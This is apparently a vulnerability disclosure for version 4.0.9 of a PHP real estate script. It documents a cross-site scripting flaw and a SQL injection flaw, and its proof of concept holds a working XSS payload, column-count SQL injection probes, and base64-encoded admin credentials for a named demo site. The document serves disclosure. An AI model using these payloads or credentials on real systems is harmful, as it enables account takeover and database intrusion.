PHP Scripts Mall Advanced Real Estate Script Version 4.0.9 - Multiple Vulnerabilities
Product :- Advanced Real Estate Script Version
Version:- 4.0.9
Vendor:- PHP Scripts Mall
Vendor URL:- https://phpscriptsmall.com/product/advanced-real-estate-script/
Cross Site Scripting
CVE-ID :- CVE-2019-20336
Proof of Concept:-
Xss:-
http://thavasu.com/demo/advance-realestate/search-results.php?Projectmain=&proj_type=&searchtext=mad">-->"><svg/onload=alert(document.domain)>
**Sql Injection **
CVE-ID :- CVE-2019-20337
Proof of Concept:-
SQLI:-
- Login to admin panel http://thavasu.com/demo/advance-realestate/admin/index.php?dlogin&username=YWRtaW4=&password=aW5ldHNvbA==
- http://thavasu.com/demo/advance-realestate/admin/news_edit.php?news_id=21%27order%20by%207--+- --- no error
- http://thavasu.com/demo/advance-realestate/admin/news_edit.php?news_id=21%27order%20by%208--+- --- error